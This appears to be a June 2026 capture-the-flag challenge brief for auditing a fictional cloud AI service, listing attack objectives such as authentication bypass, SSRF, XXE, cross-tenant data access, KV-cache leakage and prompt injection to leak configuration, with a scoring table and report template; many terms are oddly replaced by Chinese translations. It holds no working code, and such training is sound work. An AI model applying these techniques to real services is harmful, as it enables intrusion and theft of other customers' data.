June 2026: Cloud AI 安全 Challenge
Find and document vulnerabilities in a cloud-deployed AI service covering API security, model serving infrastructure, authentication, and data handling.
June 2026: 雲端 AI 安全 Challenge
Audit a 雲端-deployed AI service for 安全 漏洞. This challenge moves beyond prompt-level attacks to examine the infrastructure, APIs, 認證, and data handling of an AI application deployed on 雲端 infrastructure.
Challenge 概覽
| Detail | Value |
|---|---|
| Duration | June 1--30, 2026 |
| Difficulty | Intermediate |
| Estimated Time | 6--10 hours |
| 先備知識 | Basic web application 安全 knowledge, API 測試 experience, familiarity with 雲端 deployment concepts |
| Max Points | 100 |
Scenario
"AISaaS" is a fictional AI-as-a-Service platform that provides hosted language model endpoints to enterprise customers. The platform offers:
- A REST API for text generation, summarization, and classification
- A web-based playground for interactive model 測試
- A dashboard for managing API keys, usage, and billing
- Multi-tenant model serving with per-customer configuration
- A file upload endpoint for document processing
You have been given a standard customer account. Your goal is to find 漏洞 in the platform's 安全 posture across multiple categories.
Target Environment
API Endpoints
| Endpoint | Purpose | Auth Required |
|---|---|---|
POST /api/v1/generate | Text generation | API key |
POST /api/v1/summarize | Document summarization | API key |
POST /api/v1/classify | Text classification | API key |
POST /api/v1/upload | File upload for processing | API key |
GET /api/v1/usage | Usage statistics | API key |
GET /api/v1/config | Model configuration | API key |
POST /api/v1/config | Update configuration | API key |
GET /dashboard/* | Web dashboard | Session cookie |
POST /auth/login | Authentication | Credentials |
POST /auth/符元 | API key generation | Session cookie |
Architecture
Client → API Gateway (rate limiting, auth) → Load Balancer → Model Serving Pods (GPU)
→ File Processing Workers
→ Config Service → 資料庫
The platform runs on Kubernetes with:
- NGINX-based API gateway
- Redis for session management and caching
- PostgreSQL for user data, configurations, and billing
- S3-compatible object storage for uploaded files
- GPU nodes running vLLM for model serving
Objectives
Category 1: API 安全 (25 points)
1.1 Authentication Bypass (10 points)
Find a way to access API endpoints without valid 認證, or escalate from your API key to capabilities your account should not have.
- Look at how API keys are validated, how sessions are managed, and whether 存在 any unauthenticated endpoints that expose sensitive data.
- 測試 for common API 漏洞: broken object-level 授權 (BOLA), broken function-level 授權, mass assignment.
1.2 Rate Limit Bypass (8 points)
Your account has a rate limit of 100 requests per minute. Find a way to exceed this limit.
- 考慮 how the rate limiter identifies clients. Is it based on API key, IP address, or something else? Can you manipulate the identifier?
- Look for endpoints that are not rate-limited or headers that influence rate limiting behavior.
1.3 輸入 Validation Flaws (7 points)
Find 輸入 validation 漏洞 in the API. This could include:
- Server-side request forgery (SSRF) through the file upload or URL processing endpoints
- Path traversal through file handling
- Injection through model configuration parameters
- Oversized 輸入 handling
Category 2: Multi-Tenant Isolation (25 points)
2.1 Cross-Tenant Data Access (15 points)
Access data belonging to another customer of the platform. This could be:
- Another customer's generated outputs (cached responses)
- Another customer's model configuration
- Another customer's uploaded documents
- Another customer's usage data or API keys
2.2 Configuration Leakage (10 points)
Extract system-level configuration that should not be accessible to customers:
- Model serving parameters (GPU allocation, batch size, model version)
- Infrastructure details (internal hostnames, service endpoints, environment variables)
- Other customer account metadata
Category 3: Model Serving 安全 (25 points)
3.1 Model Endpoint Abuse (10 points)
Find ways to abuse 模型 serving infrastructure beyond normal usage:
- Prompt injection that causes 模型 to leak its serving configuration
- Requests that cause disproportionate resource consumption (denial-of-service)
- Inputs that trigger error messages revealing internal information
3.2 Inference Data Leakage (8 points)
Determine whether 模型 serving infrastructure leaks information across requests:
- Does 模型's KV cache retain information from previous requests (by other users)?
- Do error messages or timing differences reveal information about 模型 or other users' inputs?
- Is there any cross-contamination between tenants sharing the same GPU nodes?
3.3 File Processing 漏洞 (7 points)
利用 the file upload and processing pipeline:
- Upload files that trigger vulnerable parsing libraries
- Attempt path traversal through filenames or archive contents
- 測試 for XML external entity (XXE) injection through document formats
- Upload files that cause excessive resource consumption
Category 4: Data Handling (25 points)
4.1 Logging and 監控 Gaps (10 points)
識別 gaps in the platform's 安全 logging:
- Are failed 認證 attempts logged?
- Are access control violations detected and logged?
- Can you perform actions that should be monitored but are not?
- Can you tamper with or evade audit logs?
4.2 Data Retention Issues (8 points)
Investigate how the platform handles data lifecycle:
- Are deleted files actually removed from storage?
- Do cached responses persist after 使用者's session ends?
- Is uploaded data properly isolated during processing?
- Can you access data that should have been purged?
4.3 Secrets Exposure (7 points)
Find exposed secrets in the platform:
- API keys or 符元 in client-side code, error messages, or HTTP headers
- 資料庫 credentials or internal service 符元
- Debug endpoints or development artifacts left in production
- Information disclosure through HTTP response headers or error pages
Tools and Approach
Recommended Tools
- Burp Suite or OWASP ZAP for intercepting and manipulating HTTP requests
- curl or httpie for API 測試
- nmap or similar for service enumeration (only against the challenge target)
- jq for parsing JSON responses
- Python requests library for scripting automated tests
Methodology
Follow a structured approach:
- Reconnaissance. Map the API surface, 識別 all endpoints, and 理解 the 認證 model.
- Authentication 測試. 測試 for 認證 bypasses, session management issues, and key handling flaws.
- Authorization 測試. 測試 for horizontal and vertical privilege escalation at each endpoint.
- 輸入 validation. Fuzz inputs for injection, overflow, and traversal 漏洞.
- Business logic. 測試 for logic flaws in billing, usage tracking, and configuration management.
- Infrastructure. Look for misconfigurations, exposed services, and information disclosure.
Scoring
| Objective | Points | Evidence Required |
|---|---|---|
| 1.1 Auth Bypass | 10 | Demonstration of unauthorized access |
| 1.2 Rate Limit Bypass | 8 | Proof of exceeding rate limit |
| 1.3 輸入 Validation | 7 | 漏洞 details and proof of concept |
| 2.1 Cross-Tenant Access | 15 | Evidence of another tenant's data |
| 2.2 Config Leakage | 10 | Extracted configuration details |
| 3.1 Model Endpoint Abuse | 10 | Demonstration of abuse |
| 3.2 Inference Leakage | 8 | Evidence of cross-request leakage |
| 3.3 File Processing | 7 | Proof of concept 利用 |
| 4.1 Logging Gaps | 10 | Documentation of 監控 gaps |
| 4.2 Data Retention | 8 | Evidence of data lifecycle issues |
| 4.3 Secrets Exposure | 7 | Any discovered secrets |
Bonus Points (up to 10)
- Comprehensive 漏洞 report following industry-standard format (CVSS scoring, clear remediation guidance)
- Discovery of 漏洞 not anticipated by the challenge designers
- Demonstration of attack chains combining multiple 漏洞
Submission Format
Submit a structured 漏洞 report:
# 雲端 AI 安全 評估 - June 2026
## Executive 總結
[Brief overview of findings and risk 評估]
## Findings
### Finding 1: [Title]
- **Severity:** Critical/High/Medium/Low
- **Category:** [API 安全/Multi-Tenant/Model Serving/Data Handling]
- **CVSS Score:** [if applicable]
#### Description
[What the 漏洞 is]
#### Proof of Concept
[Step-by-step reproduction with exact requests/responses]
#### Impact
[What 攻擊者 could achieve]
#### Remediation
[Specific fix recommendations]Key Concepts
雲端 AI vs. Traditional 雲端 安全
雲端 AI services share many 漏洞 with traditional web applications, but they also have unique attack surfaces:
- Model serving infrastructure introduces GPU-specific concerns, including shared memory, batch processing across tenants, and KV cache management.
- Inference APIs must handle 對抗性 inputs that target both the application layer and 模型 layer simultaneously.
- Data pipelines for 訓練 and 微調 create additional surfaces for 資料投毒 and exfiltration.
- Cost models based on 符元 usage create economic denial-of-service opportunities.
The AI 安全 Stack
This challenge covers the full stack of an AI deployment:
| Layer | Traditional 安全 | AI-Specific Concerns |
|---|---|---|
| Network | Firewall, segmentation | GPU cluster communication |
| Application | Auth, authz, 輸入 validation | Prompt injection, model abuse |
| Data | Encryption, access control | 訓練資料, 嵌入向量, model weights |
| Runtime | Container 安全, orchestration | Model serving, 推論 optimization |
| 監控 | Logging, alerting | Prompt logging, 輸出 監控 |
Approach Tips
Start with Passive Reconnaissance
Before sending any 利用 payloads, map the 攻擊面 thoroughly:
- Enumerate all API endpoints and their parameters using the documentation and by probing for undocumented endpoints
- Examine HTTP response headers for technology fingerprints (server software, framework versions, 安全 headers)
- Check for client-side source code, JavaScript files, or API documentation that reveals internal structure
- Look for error messages that disclose stack traces, file paths, or configuration details
Passive reconnaissance costs nothing and reveals 攻擊面 you would otherwise miss.
Organize by 攻擊 Surface, Not Technique
It is tempting to go through a checklist of techniques (SQL injection, XSS, SSRF) and try each one. A more effective approach is to organize by 攻擊面:
- Authentication surface. How is identity established? 測試 all 認證 mechanisms.
- Authorization surface. How are 權限 enforced? 測試 every endpoint for horizontal and vertical privilege escalation.
- 輸入 processing surface. What inputs does 系統 accept? 測試 each 輸入 for injection, overflow, and format confusion.
- Data boundary surface. Where does data cross trust boundaries? 測試 for leakage at each boundary.
- Model interaction surface. Where does 使用者輸入 reach 模型? 測試 for 提示詞注入 and model-specific attacks.
This approach ensures comprehensive coverage 因為 it maps to how 系統 is structured, not to how your toolkit is organized.
Document Everything
雲端 安全 assessments produce large volumes of evidence. Without organized documentation, you will:
- Forget which endpoints you tested and what the results were
- Waste time re-測試 things you already checked
- Produce a report that is disorganized and hard to follow
Use a structured note-taking system from the start. 對每個 endpoint you 測試, record: the request, the response, your interpretation, and whether it warrants further investigation.
Think Like an Operator
Many 雲端 AI 安全 issues are not traditional 漏洞 but operational misconfigurations:
- Default credentials that were never changed
- Debug endpoints left enabled in production
- Overly permissive IAM roles granted during development and never tightened
- Logging gaps where 安全-relevant events are not captured
- Secrets in environment variables instead of a secrets manager
These issues are easy to find with systematic checking but easy to miss if you are only looking for traditional exploits.
Further Reading
- 雲端 AI 安全 -- foundational concepts for this challenge
- Infrastructure & Supply Chain -- infrastructure 安全 fundamentals
- LLMOps 安全 -- operational 安全 for AI systems
- July 2026 Challenge -- the next challenge